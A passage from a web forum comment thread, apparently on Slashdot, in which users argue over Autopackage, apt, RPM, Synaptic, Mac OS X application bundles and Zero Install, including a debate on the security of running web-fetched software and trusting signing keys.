And are views even necessary? When you need to address all the different files from a particular app, you use a pakage manager anyway.

Re:Linux

[UniverseIsADoughnut]

No you don't.

At most you need one for 9x series and one for NT series, but even then most things will work on all with just one package.

Re:Linux

Actually he's not trolling. Google PAE - it's the hack 32bit Intel processors have to use to access more than 4GB. Welcome to the segmented mode ... again. Only MUCH slower, as you only have 32 address lines, not '16 but really 20'

So, to end the rant - 32bit linear mode, apps get 2G (3G with hacks) out of the max. 4G that the OS can use. Segmented mode ... you still get a 4G hard limit per segment, with the added bonus of slow access and dead-slow I/O. Maybe you should elaborate what you mean by 'high-memory Windows computer'? surely, not 'past 640k', right?

This will make life easier

[Man+in+Spandex]

You know what, some ppl have to understand that not everyone is attatched to strictly one distro. If that was true, then autopackaging wouldn't exist.

This will make life easier for developers instead of making 10 thousand kind of different binaries.

Look at Fluxbox's webpage you got:
- RPMS for SuSE and Fedora
- tgz for slackware, *BSD
- .deb Debian/Ubuntu
- ePenis for PenisDistro

How is that any good? Just confuses more the newcomers who try Linux and don't know what to download. Tell a user to try Fedora and he falls on a webpage that offers many kind of rpm's and he has to take his time to understand the difference between them. LEARNING IS FUN I Agree but not every user want to learn the ins and outs of linux. That's why they get 50 000 spyware on Windows. If the guys who make autopackaging can gather more support from many organizations and distributions and start trying out this solution, we will be getting somewhere and maybe that quote "THIS YEAR IS THE YEAR OF LINUX" might be a bit more realistic to say... or maybe not :X

Re:nextgen already here: emerge

[Lepaca+Kliffoth]

You're a hopeless fanboy and because of fucked up idiots like you the world hates gentoo users. I'm positively scared by the possibility of getting the portage tree from the same mirror you touched with your filthy connection. I hope an axe falls on your modem cable and frees the net from just another fucking Gentoo preacher. To the guys who read parent and think "gentoo users are idiots": we're not like him. He represents a very noisy minority.

This will help...

Try this next time, it should help you out.

#rpm -qa | grep

example - looking for the kgames rpm

#rpm -qa | grep kgame
kdegames3-3.2.1-28
#

Learn to use grep and pipes and it will vastly improve your experience.
Cheers

A nice mix between what Mac OS X got right

[melted]

A nice mix between what Mac OS X got right and what Windows got right. First part is stolen from Mac OS X, second part (list of installed apps) - from Windows.

Looks very promising overall. Now if it also downloads binary dependencies, I'd say we got a winner. If it doesn't - I'll have to continue using Yum.

Re:nextgen already here: emerge

[thk]

Seems to me that most users that have actually tried gentoo really like it. I've run small networks of workstations on redhat (2yrs), debian (2yrs), fedora (2yrs), have run a small cluster on the rocks distribution. I made all of these work. They all have their strong points. I've recently switched to gentoo (several months) and find it to be by far the best for experienced admins / technical users. It does seem to attract a lot of kids that want to impress their friends by using an advanced distro. However, the core developers have done thus far a superb job desiging gentoo and it is very stable and capable in the hands of an expert.

BTW, resorting to name calling really only betrays ignorance.

Ciao.

That's right. apt-get works.

[khasim]

Yes, I did read your FAQ. Are you going to answer EVERY question with

Please read our FAQ.

Here's the line from the FAQ you keep telling people to read:

If I install an autopackage, RPM won't know about it!

As of 1.0, correct. For applications this isn't a big deal. The biggest advantages of having RPM know about an application installed via autopackage are that you can query file ownership, and if you upgrade to a newer version in RPM form (for instance, your distribution installs it automatically), things will work cleanly. Neither of these are huge problems.

Hey, it's not a "huge problem" for you, but I think I'll avoid something that will BREAK the WORKING system I use right now.

Re:That's right. apt-get works.

[Master+of+Transhuman]

And exactly how does installing something your RPM database doesn't know about NECESSARILY break your system?

Are you saying you NEVER install anything other than an RPM?

Including third party apps and miscellaneous small utilities? We're not talking OS core here, remember.

Re:That's right. apt-get works.

[IamTheRealMike]

Having applications (as opposed to libraries) installed outside of apt doesn't break anything as they aren't dependencies of things.

Re:That's right. apt-get works.

[Tony+Hoyle]

Yes they are.. it's quite common for packages to rely on other packages to be useful.

Any system that does not work with the existing dependency system is just not useful to me. Nice try, but no cigar.

At no point has anyone explained what the *point* of this is? Whoopee it's a frontend. Never use them myself, but what makes your system better than red carpet or aptitude?

And *don't* say read the frikkin FAQ. Your server is dead, I can't, and I'm damned if I'm coming back here every 20 minutes for the next two days until it comes back again..

Re:That's right. apt-get works.

[IamTheRealMike]

So read the mirrored copy instead.

Autopackage does support dependency resolution. And yes, it would be nice for it to integrate with dpkg/rpm so tools like apt can "see" it. The ignorance of apt to software not installed by it is a failing of apt not autopackage, but one we must work with. Doing so has been on the roadmap for a long time now, but as it's so very rare for one application to depend on another (think word processor needing drawing app - rare) it wasn't deemed essential to 1.0

Re:That's right. apt-get works.

[51mon]

Sorry this is a cop out.

If you are introducing a new installation system into the environment you should make it work with the estalished system, not complain that it is faulty because the establish player didn't anticipate someone trying to break a well establish principal in computer systems management of staying within the package management system.

Of course the reason Debian deb doesn't do this is "there is no point", if you can present something that contains all the information in a well form deb you can just convert it mechanically to a well formed deb. If your package doesn't have all that information... then I don't want to install it.

Re:That's right. apt-get works.

[IamTheRealMike]

I disagree. I think it was perfectly predictable that people would want to install things outside of the apt repositories, just installing from source tarballs is very common. Not anticipating this is a design problem with apt/rpm but one that won't be fixed anytime soon.

Re:That's right. apt-get works.

[51mon]

Which is why there are tools to turn other package formats (RPMs, tarballs) into debs.

People might think they want to install something that isn't a deb yet - but that is a perception issue, they just need to learn to make debs* - once you've spent 15 years maintaining systems your heart sinks every time you step outside of the native packaging system.

So where is it?

[NoOneInParticular]

pjoetr#> apt-cache search autopackage
pjoetr#>

;-)

Already exists, and is superior to .app

http://zero-install.sourceforge.net/

A young project but quite revolutionary. Applications run from cache. A GUI to this for those not friendly with the CLI could be significant.

Make sure you read the page to understand what it offers and why.

By the way I prefer the Debian way of installing software, it's a no-brainer.

I use the CLI but my 10 year old cousin uses http://kefk.net/Linux/Distributionen/Allgemein/Fed ora/Versionen/Core.1/Screenshots/kpackage.png KPackage as an interface to apt.

Just Works TM.

Re:Already exists, and is superior to .app

[Master+of+Transhuman]

Looked at the zero install site. Interesting. However, no discussion of dial-up net connections and how that might impact the initial run. Of course, without zero install you'd have to download it anyway...And once it's cached, it wouldn't matter.

However, what happens if the site is down and you need to run something that needs to be updated? Not necessarily too likely, but that's just off the top of my head.

Seems to me this would have problems very similar to why I treat the notion of "web applications" and ASPS with suspicion. I think I prefer having control of my apps on my own machine. I never bought Sun's "the network is the computer" model - because it's not. Not yet, anyway.

Re:Already exists, and is superior to .app

[tal197]

"Looked at the zero install site. Interesting. However, no discussion of dial-up net connections and how that might impact the initial run."

From the ROX site:

"I've only got dial-up; won't Zero Install be too slow?

No. Because Zero Install only downloads the parts of the software that you actually use, you'll typically download much less this way. For example, if you don't read the manual for version 2.1.2 of the filer, or use the french translation, then they will never be fetched. If you download traditional tarballs, debian packages or RPMs, then you end up downloading a lot more stuff you'll never use.

For reference, running ROX-Filer for the first time though Zero Install took 1m48s when the internet connection was an irDA link to a mobile phone connected via GPRS (download speed approx 2.5 Kbytes/sec). If you use a normal modem it will be faster than this, and broadband will be faster again, of course."

Re:Already exists, and is superior to .app

[Master+of+Transhuman]

That sounds good, but I'm confused. How does Zero-Install know which parts you actually use - especially if you've never downloaded the program before? Or for that matter, later? Does it look at the file access dates or something? That would be nice.

OTOH, there might be occasions where I DO want to download the whole thing, so that should be an option.

I'll have to look into more thoroughly once I get my ancient RH 7.3 upgraded to current. If this method can be made to work well, without the potential problems of Web apps, I think it would be very cool.

Definitely getting rid of the notion of "installing" software would be a huge leap forward in ease of use.

interesting explanations

[l3v1]

I follow .a progress for a while now, and there always were things that bothered me. First, rpm is mentioned too much, others (apt inclusive) too less. When they reason about existing package systems and package management solutions, almost all the time everything is put into a big huge hat, mixed and at the end they just talk about package management systems as a whole, all of it being a piece of crap and useless to the extremes.

Secondly, I find the type of reasoning absolutely not convincing when they talk about the - only - way .a can become useful and survive: try and convince the library maintainers to produce their own autopackages, you could produce your own ... or you could statically link the library ... the development of a desktop Linux platform meaning this stuff i absolutle yno good unless everybody else drops everything they have and praise the new overlords of Linux package creation and management. Which is IMO quite a weak position.

Thirdly, arguing that .a is all over better than anything else out there, and again too much rpm-talk coming in waves (Why do the RPMs I find on the net today only work on one distro? then rpm features rpm can't do this, rpm won't work there, ... wait, since when has rpm stepped out of some-of-us's nightmares and became "the" package management system everybody compares everything else against ? I can't even count the people I heard - including myself - swearing loud over rpm's "features" along the years.

Does it do automatic dependency resolution like apt and emerge?

Now, the only question I'm interested about. Given this, the (l)user-joe-6pack world would finally get to know some what package management really means.

At this point, you all probably just hate me all over and can hardly wait with that troll and flamebait clicks. To you, I have to tell, that .a is one of my dreams coming true. Ever since my first encounter with apt. So please, believe me I'm not against .a in any ways. I just find most of the reasonings behind it very weak. There are bad ways t do package management out there, plenty. Those that use them probably will feel in heaven when .a comes down to them. As for the other, well done and very good working package management systems, I just don't feel justified the bashing that goes towards them, trating them as they were just as lame and useless as the junky ones.

Okay, I blattered 'nuff. Go .a .

Re:Wrong Paradigm/right discussion

[zogger]

I agree but want to expand on it some. Linux isn't on most peoples radar yet, they may have heard the word but frankly do NOT even know the difference between an OS and an application. The main reason this hasn't happened is because the major vendors don't (conversationally speaking now, in general) ship linux pre installed by the millions, and the main reason they don't do that is because there is *no* standard linux OS for them to ship. Can you imagine the nightmare of trying to do tech support for the few hundred linux distros out there, once people had "A" distro and then wanted to expand it with some more "Linux apps"? The vendors aren't that tarded. Something like autopackage has been needed, along with a true LSB layout. Get those two concepts running more, and maybe end the DE wars as well and you got you a more acceptable "product". this and that larger commercial linux vendors are trying, to get their distros pre installed on more machines, but those result in a locked down propietary dealie again, something that needs to be avoided somehow.

The main deal is, you can't talk about hobbiest distros and then try to make them into some universal bigtime distro for this "the masses" guy. You can go right down the pike and look at so called debian based distros, frequently even those have enough of a difference to make this or that not work. Hundreds of guys all re inventing the same wheel, over and over again, said wheels not fitting on any car but their own. Fun for them, but it's not going to result in "linux on the desktop" this decade. And installation is a big part of that problem.

apples and oranges. No one wants to remove enthusiasts ways of doing things, but what they want to do is to take the concept of a linux desktop mainstream. Being able to deal with applications and installation is a prime concern. This is a good thing if you care about something like that. The two camps can still co exist splendidly. If someone wants to make "fred"s distro" that works completely different from everyone else, no probs, go right ahead, just they shouldn't expect it to become bigtime mainstream any time soon.

I applaud the autopackage guys and the LSB guys. That edges it much closer to a viable alternative for millions more people, they are way useful standardization schemes, long overdue.

Where Can I...

[Cylix]

Where can I find the rpm? ;)

Re:Where Can I...

[IamTheRealMike]

When it comes back up there's an RPM of the support and developer code on the website, for those who want it (though they aren't required). We're not anti-RPM or anything you know ;)

Re:Where Can I...

[Cylix]

That was a joke though :(

Need a package of a package manager....

Nevermind.

Re:Where Can I...

[IamTheRealMike]

Yeah I know ;) But having built the damn things I wanna pimp them

97% of people don't care

The remaining 97% don't care what they get. They just use it, and don't take advantage of the advanced features. That's the way it always has been and always will be. But it's the 3% that do care that get to choose what they use, because they are the programmers that write the software the rest use.

SINGLE MOST IMPORTANT LINUX PROJECT TODAY

Period.

We have that already.

[khasim]

Most layusers will want some easy installation like this instead of using something like Yum (even if it is a GUI front-end to yum like GYUM).

Why do they want that instead of GYUM?

This is one giant step towards a viable desktop linux - and I believe that it isn't a replacement for apt/yum/[INSERT YOUR FLAVOR HERE] but uses them under the hood.

No. The problem is that it BREAKS the package management of those systems.

So now I'd have to use TWO methods of updating my system. Great. Just what I was looking for.

Before everyone starts bashing it and says that apt or emerge or whatever they use is the way to go, seriously think about it - one click installation, from a FRIENDLY user-interface, and easy to manage system for installing and uninstalling programs.

Synaptic. Already there.

Now if this were part of the base install on many distributions and some sort of standard was established (seriously, we need standards) I can probably convince my scared-of-Linux-because-it-is-hardcore friends to actually try Linux out.

Who is "scared of Linux" because Synaptic is too hard?

There's a LOT more to package management than just getting software onto your system.

Is the user it runs under setup correctly (what? you plan to run everything as "root"?)

Has it been suid correctly?

And so forth.

Re:We have that already.

[Coryoth]

No. The problem is that it BREAKS the package management of those systems.

So now I'd have to use TWO methods of updating my system. Great. Just what I was looking for.

Autpackage should sit peacefully alongside other package management systems, it is designed to be complementary, nt a replacement. As to a central place to manage your packages from, try Smart - it gives you a single interface view to your packages whether they be via RPM, DEB, TGZ or whatever. I have been contemplating writing an Autopackage channel/backend for Smart so that autopackage packages that have been installed will show up in smat and can be removed etc. from there as well.

Jedidiah.

Re:We have that already.

[Minna+Kirai]

Synaptic. Already there.

No it isn't.

For normal users installing software, a GUI effectively doesn't exist if it's outside of the "Google path". That is, they will search Google for the software, and find either a direct-download link, or a store offering to ship it for money. Either way, they acquire an install file, click on it, and the install GUI begins.

Because synaptic is outside the distrib flow chain of most software publishers, it is so far off the radar it might as well not exist. (You can't go to the homepage for Firefox or OpenOffice and get instructions "look for it in synaptic first, if you have synaptic, and if you know what the root password is").

Who is "scared of Linux" because Synaptic is too hard?

Synaptic isn't a very nice GUI. In particular, deb packages can have interactive questions embedded in them, which are handled within a popup xterm. Until synaptic manages to 100% swallow those as X11 dialog-boxes, it won't even qualify for what most people call "GUI"

PS. Synaptic could be tremendously improved if it got another pane replacing the package list, which showed only those packages most potentially interesting to desktop end-users, with a colorful icon and 3 line description for each. Something like a top-forty, with a weekly "Editor's Pick" and "New Releases".

Re:We have that already.

[51mon]

You can't go to the homepage for Firefox or OpenOffice and get instructions "look for it in synaptic first"

Why would you go surfing the Internet for random pieces of software, when they are already under the icon labelled "install software" on your desktop?

I think you really don't get it. Users have a very broken model of how to install software which IT security managers have been trying to bash out of them for years.

Synaptic has user interface issues, that is it's main downfall.

Re:We have that already.

[Minna+Kirai]

Why would you go surfing the Internet for random pieces of software

Google is a better search engine than most any. Even for a random piece of information which I _know_ I have stored on my own hard drive, its often faster for me to locate the original again on Google, rather than scanning my own disk.

when they are already under the icon labelled "install software" on your desktop?

Of all the software a user could install on her computer, 100% of it can be located on Google. Necessarily, the Synaptic list will be smaller, and have a greater chance of not containing the program she wants. (That is especially true if the program is either very new, or distributed through commercial sales, or both). And obviously, users tend to search for things where they can be found.

(Plus, the opening interface of synaptic is fairly hostile if your goal is to discover software to fit a need, instead of installing a package whose name and prsence you already know)

Re:We have that already.

[radarsat1]

perhaps what we need then is a format where the user can download a very small file from the program's web page containing a package name and some sources.list entries.

Then, when you double-click on this file, it launches synaptic and automatically downloads and install the software (merging the included sources.list entries with the current ones).

One thing users will never do is edit sources.list themselves...

This would be nice, as the user would have a package to download and click on, but then it would still grab it using apt. And since you could include a new sources.list entry, developers could link to their own .deb files instead of relying on the debian package managers to include them in the main distro...

Re:We have that already.

[51mon]

Google ain't a good search tool for software, just think about the machinations you have to go through to get it to stop telling you about Windows software when you want GNU/Linux, or in my case "Free Software" not freeware.

As regards finding suitable software - sure synaptic needs better defaults, but "search", select "Description", and enter a keyword. If they can't do that don't expect them to use Google successfully.

Re:Linux

I once saw a Linux box which refused to address a quarter of its RAM too.

It was bad memory. That's the only reason I've ever seen Windows refuse to address RAM (Well, Windows NT at least... 9x/ME is an abomination upon the earth).

But you're right, Windows should work on hardware which doesn't even work properly. After all, Linux can run on toasters, right?!

Please!!!

[SsShane]

I love Linux but 60% of the programs I try to install without the benefit of apt-get fail for some cryptic reason or another. Sometimes I work it out after fiddling with it for a bit but to be honest I don't have time for that. Thanks

It Doesn't make sense ...

[GNUALMAFUERTE]

They present a new piece of Free Software, that is supossed to help the hacker community, and they use proprietary software (Flash) to show the software to the public?. This kind of thing hurts the GNU Project, because it makes people think that using proprietary software is ok.

Re:It Doesn't make sense ...

[The+MESMERIC]

it is ok

Re:It Doesn't make sense ...

This helps the community because it should make Macromedia realize that they should port their software to Linux!!

Re:It Doesn't make sense ...

[GNUALMAFUERTE]

If Macromedia Ports they software to GNU/Linux, they would be actually HURTING our comunity, because they would be trying to give us proprietary software.
This is not about software availability for a specific plataform, this is about users freedom to use the software, we don't need more restrictive software runing under a free plataform, we need more software that let's it's users be free. If Macromedia wants to help our comunity, then they should release their software under a Free Software license.

Re:It Doesn't make sense ...

[Guy+Harris]

They present a new piece of Free Software, that is supossed to help the hacker community, and they use proprietary software (Flash) to show the software to the public?

Can any code using GPLFlash play that demonstration? Or does it use features not supported by GPLFlash?

Re:It Doesn't make sense ...

[GNUALMAFUERTE]

I have serious concerns about GPLFlash, because of two reasons:

1) The SWF format, i'm not sure it's legal to read/write in this format, i would like to know what patents Macromedia holds over Flash, and over SWF specifically-

2) Each time there is a proprietary format, and some Free Software development tries to interact with it, the company changes the app that creates those files to break interoperability. Also, since there is a Free player, but not a Free aplication that let's you create this files, you, by seing SWF files, are encouraging the use of a proprietary aplication (Flash itself, used to create SWF files) and a proprietary format (SWF)

Is there an RPM for it?

[TheZax]

Yeah, where can I get the .rpm package for AutoPackage?

Re:Is there an RPM for it?

[Freyr+Vanir]

Download a package and run it.It will download and install autopackage for you then the package in question.

Zero Install

[delire]

Autopackage looks excellent and will make it easy for all developers to roll out one package for all distros. Another system also interests me alot however...

With the Zero Install system, applications aren't actually installed (as the name errm suggests), instead they run from a cache immediately after download. You click to download and then it runs - all dependencies grabbed from the package host. The next time you run it it loads immediately as it's already cached. Quite innovative.

http://zero-install.sourceforge.net/

Re:Linux

So... you're saying he's not trolling because he's attributing a hardware fault to the OS?

Oh, that's right, he's only not trolling because he's attributing a negative feature to Windows, even if it doesn't deserve it.

And by 'High-Memory Windows computer', I mean I've dealt with 64 bit Windows servers, as well as high end Windows workstations with gigs of memory...

Not mirrordot, however the gcache is here

[infonography]

Autopackage FAQ

I for one...

... welcome our Autopackage overlords...

Seriously, this sounds like a brilliant project. Not sure how easy it will be to keep it up to date though.

We already do that in Windows.

[khasim]

You update the OS/Office from Microsoft's web site.

You check other sites for any other updates.

With Debian, a vendor would simply add his website to the sources.list and apt-get update would check for updates to that vendor's product.

The distribution should have a pool of servers for the software included with that distribution. There's no reason why other ISV's would have to use those servers.

Obligatory OS X user response

[bonch]

Hmm. I just drag the icon to my Applications folder. Or if it's a plugin, to its relevant /Library/Components/Appname folder. And so on.

It would be great if Linux actually implemented drag-and-drop install. OS X already does it, and .NET allows for it (eliminating the use of the registry).

Re:Obligatory OS X user response

[IamTheRealMike]

Sure, that UI is a good one and we want to implement it (and have a concrete implementation idea to back it up). But getting installs reliable and easy is a higher priority, different kinds of UI can come later.

Re:Obligatory OS X user response

[Doc+Ruby]

Do OSX apps automatically download and install the other packages on which they depend? I'd love to get an Apple designed GUI for controlling the power of apt-get (and now perhaps this autopackage).

Re:Obligatory OS X user response

[Goaway]

In the rest of the civilized world, software installations do not depend on a big tree of other software installations, but instead include the files they need in their own distribution, thus working more or less out of the box.

I know this is a somewhat alien concept to most Linux users, but this is really how things work.

Re:Obligatory OS X user response

[Doc+Ruby]

Actually, I find that kind of packaging barbaric. The whole point of open source software is to reuse software whenever possible, so every new app can be as incremental as possible. Tell me you don't use shared libraries, or that you reinstall them with every app. Seems like a real waste - monolithic bloatware.

Re:Obligatory OS X user response

[Goaway]

And that's why the Linux world is STILL trying to figure out how to INSTALL software. You've created such a horrid mess of interlinked libraries and packages that you can no longer even distribute a program without a huge effort.

Linux users used to mock Windows users for "DLL hell" back in the nineties. And then they went on to create something orders of magnitude worse.

Re:Obligatory OS X user response

[Doc+Ruby]

I dunno - what's the huge effort? Again, it's like any other open source architecture, where the upfront cost is higher to manage complexity, but then you've got a more complex system that does more and is more manageable. DLL hell was a consequence of inadequate version control and automated installation management. Dependency hell is an infrequent consequence of abuse of the package system. Whereas in your world, developers go through dependency hell every time we add even a single feature to an already complex app, packing the installer.

Re:Obligatory OS X user response

[Goaway]

That's what developers are THERE for. Offloading the developer's work onto the user is utterly crazy.

But quite common in the open-source world, and apparently this is supposed to be accepted behaviour.

Re:Obligatory OS X user response

[Doc+Ruby]

The work is offloaded onto the *machine*, by the package system. I really don't know what experience you have with it, but it works very well, with few exceptions. Caused by negligent developers (package maintainers), just as other installation bugs are caused in the OSX system. It's not acceptable, but it's the best alternative, and getting better with each new release. Including the autopackage we're discussing in this thread.

Re:nextgen already here: emerge

[linguae]

That's fine, but why are we trying to piss off the entire BSD community by bringing portage to BSD now? Have you talked to any BSD guys lately? They hate Gentoo guys now :(

Portage would never be ported (no pun intended) to *BSD, because we already have Ports. The only difference between Portage and Ports is the former uses emerge application and the latter uses cd /usr/ports/category/application && make install clean. To install precompiled packages, its emerge --usepkg --getbinpkg application or pkg_add -r application, respectively. I can go on about the similarities and differences.

Plus, I don't know about the rest of the BSD community, but I am fond of Gentoo. In fact, if I had to switch to Linux tomorrow, I'd move immediately to Gentoo because of its philosophy and way of doing things. Plus, about 6-7 months ago, I was very close to considering installing Gentoo, but somebody gave me some FreeBSD disks, and I got hooked on FreeBSD. Gentoo has just about the nicest documentation that I've seen for a Linux distribution, and I like the ease of upgradability for applications and for the OS. To me, Gentoo has the BSD philosophy with a Linux kernel and GNU tools.

Re:nextgen already here: emerge

Well fucking said.

Interesting criticism of the OSX DMG

[delire]

From the maker of Autopackage:

In order to integrate with the web, MacOS X has some pretty awful hacks: self mounting disk images spring to mind. A DMG file is basically like a disk image that can be mounted as a loopback device: the web browser is responsible for downloading this, mounting it, extracting the appfolders if any are present then unmounting the disk image again. The end result is that clicking a link in a web page can silently place software on your desktop, sometimes with no notification that this has occurred.

Here http://bylands.dur.ac.uk/~mh/autopackage.org/ui-vi sion.html under 'Installation'.

Re:Interesting criticism of the OSX DMG

[argent]

In order to integrate with the web, MacOS X has some pretty awful hacks: self mounting disk images spring to mind.

I would say rather "For some reason known only to Apple, and with absolutely no justification, and certainly unrelated to the DMG format, the standard NeXTSTeP/Cocoa application bundle, or the normal Mac OS installer bundle, SOME dmg packages are configured to automatically install...."

DMG is a disk image format. A DMG is pretty much similat to an ISO, and in fact many DMGs *are* ISO images. A DMG is not an Apple installer bundle, and this is unrelated to Apple's installers and applications other than by accident of birth.

There are many reasons that I recommend everyone should disable *any* automatic package opening in their web browser. This is one of them, but no OS and no application should be considered an exception.

Re:Interesting criticism of the OSX DMG

[argent]

Setting aside the irrelevant issue of self-mounting disk images... which has nothing to do with the package format.

You can drag the appfolder from removable media to your system and vice-versa, but you cannot drag the appfolder into an email or IM conversation due to the way the system is implemented.

Why would you expect to? Can you drag /usr/bin/somapplication into an email or IM conversation and expect the result to be something that your recipient can usefuly work with?

You *can* reight-click on the appfolder, select "Create an Archive...", and drag that into your IM or Email.

Many applications make assumptions about being able to write to their appfolder. This means you sometimes have to move the appfolder to the hard disk before it will run - but this is not always intuitive nor obvious.

No well-behaved application does so, any more than a well-behaved application assumes it can write to /usr/local/lib on Linux. If an application breaks when you don't have write-access to the appfolder, complain to the publisher or author... ALL configuration is supposed to happen in the system or user Library directory.

Little attempt is made to manage multi-user setups. With a large library of software, the "menu" (normally the file manager is used) can become cluttered with programs irrelevant to the user. If all users can install/uninstall software, you have to manually track what people are using so you don't accidentally remove something another user wants to keep.

And it is so hard to create ~/Applications and put your personal applications there?

Re:Interesting criticism of the OSX DMG

[delire]

Interesting things to point out - I think .app/.dmg is an interesting approach to the problem of software installation and see it as a good influence. At first I was very skeptical as I come across many OSX users totally confused by the system and came to me with complaints.

Reclaimer: I'm an occassional OSX user (I teach on OSX from time to time). Personally I dislike the interface and it's hardware dependency. Debian's apt has served me wonderfully over the years and continues to satisfy migrants from other operating systems through friendly frontends like KPackage (QT) and Synaptic (GTK).

Re:Interesting criticism of the OSX DMG

[argent]

Interesting things to point out - I think .app/.dmg is an interesting approach to the problem of software installation[...] .app and .dmg are separate things. DMG is an archive format, here, NOT a package format. You don't need .dmg to get the benefit of bundles. You can put appdirs and other bundles in ZIP files, Stuffit archives, tarballs, PAX archives, and so on.

I have never forgiven Debian for dselect.

Re:Interesting criticism of the OSX DMG

[delire]

Horrible! Tied to a chair in a UI concentration camp forced to use dselect while the rest of us forgot that both the camp and dselect even existed. You're right, it is horrible, however why would anyone ever use it I don't know. I doubt it's even in the base install these days.

Re:Interesting criticism of the OSX DMG

[argent]

Tied to a chair in a UI concentration camp forced to use dselect while the rest of us forgot that both the camp and dselect even existed.

You bastards, here I am, still stuck in my formative experience with Debian back in, oh, I don't know, 1998... screaming at the humanity of it all...

I didn't say Debian had traumatised me lately. It hasn't. After several nasty shocks like that from Linux I shook the dust off my sandals and went back to BSD-land. It hasn't had a chance to piss me off, and I'm not going to give it one.

And a pox on Gnome and KDE both. Give me a good GNUstep-based Linux distro and I'll give it another chance, but not if they can't figure out that installers are evil, EVIL I tell you! (crazed laughing and wretched sobs...)

Re:Interesting criticism of the OSX DMG

[delire]

Have you looked at 0install.net? If so what do you think?

Re:Interesting criticism of the OSX DMG

[argent]

Have you looked at 0install.net?

No. Let's see.

Users run their applications directly from the Internet from the software author's pages.

Through a web interface?

If they can make that secure, they deserve three Nobel Prizes and a Fields Medal. Since I don't think they're the reincarnation of Alan Turing, Richard Feynman, and Albert Eienstein combined my reaction is "stercus, stercus, stercus, moriturus sum...".

and since it doesn't run any of the remote code as root, you can try software out safely as a 'guest' user.

All that means is "now all your local root exploits are remote root exploits". stercus, stercus, stercus...

You open the directory containing Memo (on the remote machine) with your file manager [...]

No, I don't. This step... using a program (the file manager) whose security is based around managing local and generally trusted files to access remote an generally untrusted files... is one that should not be taken. It's not acceptable when Microsoft does it, it's not acceptable when Apple does it, and it's not acceptable when these guys do it. This has all the same security issues as Internet Enabled Disk Images, Active X, Launchservices, and the Microsoft HTML control. It's not nearly as bad as ActiveX and the Microsoft HTML control, but it's the wrong direction to go.

There really does need to be a clear and obvious distinction between trusted and untrusted resources. Any application or interface that blurs that distinction for the user is a bad thing.

Re:Interesting criticism of the OSX DMG

[tal197]

Users run their applications directly from the Internet from the software author's pages.

Through a web interface?

No. With their application launcher.

and since it doesn't run any of the remote code as root, you can try software out safely as a 'guest' user.

All that means is "now all your local root exploits are remote root exploits".

By that logic, we should all run everything as root all the time, since any local expoilt makes the root/user separation irrelevant. Use whatever amount of sandboxing you feel comfortable with (Linux root/user, user-mode-linux, VMWare, Java sandbox, etc).

"This step... using a program (the file manager) whose security is based around managing local and generally trusted files...

Local files aren't 'generally trusted' (at least, not on multi-user system like Linux). And filemanagers are routinely used to access NFS directories and shares on other computers.

However, the key point to remember is this:

Any user can already run any software from the web. Zero Install just provides a way to share it securely between users (so that if two users run the same software, it only gets downloaded once).

Re:Interesting criticism of the OSX DMG

[argent]

No. With their application launcher.

Not having a Linux box to test it on, I have to go by their documentation, and it sounds like they're embedding their launcher into the Konqueror engine.

By that logic, we should all run everything as root all the time

Don't be silly, I'm just making the point that running something as a normal user instead of as root is not nearly as strong a protection as people imply.

Local files aren't 'generally trusted' (at least, not on multi-user system like Linux).

For most users, their Linux box isn't a multi-user system. For most of the rest, they know the other users of their machines, there is a social relationship between them, and damaging the shared server will damage all of them. Even in extereme cases, like a shared university server, the relationship between account holders is still orders of magnitude greater than between the owners of arbitrary websites.

And filemanagers are routinely used to access NFS directories and shares on other computers.

There is explicitly at least a partial truct relationship between computers that have access to each other's NFS shares. That's the way NFS works. Resources accessed through NFS are not significantly different from local resources.

Any user can already run any software from the web.

But, as far as I can tell from that website, Zero Install makes running that software from the web a transparent operation that is almost indistinguishable from running that same software after someone has explicitly and deliberately downloaded and installed it. It makes a remote untrusted resource appear local, and removes that final "OK, I'm installing software from the Internet now" step.

Losing that step has proven remarkably useful for malware authors on Windows. Losing that step is a bad thing.

Re:Interesting criticism of the OSX DMG

[tal197]

Not having a Linux box to test it on, I have to go by their documentation, and it sounds like they're embedding their launcher into the Konqueror engine.

It's just executable files appearing in the file system, so anything that can run executables can use it (konquerer, shell, etc). I can see why konqueror would be confusing, since it is both a file manager and a web browser.

The example screenshots show ROX-Filer being used, which isn't also a web browser, so it's a bit clearer in that case.

"But, as far as I can tell from that website, Zero Install makes running that software from the web a transparent operation that is almost indistinguishable from running that same software after someone has explicitly and deliberately downloaded and installed it."

Yes, you wouldn't want users to run software thinking they were just following a link in a web page. I've just tried it in firefox, and it just shows the contents of an executable shell script rather than running it.

Incidentally, the injector (next version) does ask users to confirm that they trust the GPG key of a software author before allowing them to run the software: the injector.

Re:Interesting criticism of the OSX DMG

[argent]

The interface is correctly signed with the following keys:
- Valid signature from 92429807C9853C0744A68B9AAE07828059A53CC1
Do you want to trust all of these keys to sign interfaces?

Not unless you're prepared to ask me this question every time you download and run anything off the net.

Re:Interesting criticism of the OSX DMG

[tal197]

The interface is correctly signed with the following keys: - Valid signature from 92429807C9853C0744A68B9AAE07828059A53CC1 Do you want to trust all of these keys to sign interfaces?

Not unless you're prepared to ask me this question every time you download and run anything off the net.

Why? If the key owner is a responsible software developer today, they're unlikely to turn into a script kiddie overnight. And if they're already malicious, then they get to overwrite your trust setting as soon as their program executes anyway.

(note that you'll still have to click on the Execute button before running an updated copy of this program, or any other program written by this author, and you can choose whether it will check for new versions automatically)

What is the threat you're trying to protect against? Something like this?

1. I run gimp.org/gimp.
2. I agree I trust the gimp developers.
3. I click on the upgrade button to get a new copy.
4. I'm asked to confirm the key a second time, and this time I decide I no longer trust that developer.

This doesn't seem to be a likely source of attack. I'd rather only be alerted when I need to trust a new key, or I'll just get used to clicking on accept.

Re:Interesting criticism of the OSX DMG

[argent]

If the key owner is a responsible software developer today, they're unlikely to turn into a script kiddie overnight.

That's not the point.

The problem is that that given the way 0install works... once you have agreed to accept a key, that key now has the ability to access your computer without any further explicit action. If the application is deleted to save space, it will automatically be redownloaded the next time you run it, right?

Right now if gimp.org is compromised, the only people who have to worry about that compromise are peolpe who explicitly downloaded and installed gimp. They know they did it.

With 0install, anyone who clicked on gimp and went off to make a cup of coffee while this fairly large application was started may miss it reinstalling, because it never asked them if they wanted to reinstall it... because it trusted the gimp.org key.

I'll just get used to clicking on accept.

Maybe you will, but at least you'll know you've potentially been exposed.

Automatic install, without an explicit request from the user, is dangerous. It must be possible to turn it off in all circumstances.

Re:Interesting criticism of the OSX DMG

[tal197]

If the key owner is a responsible software developer today, they're unlikely to turn into a script kiddie overnight.

That's not the point.

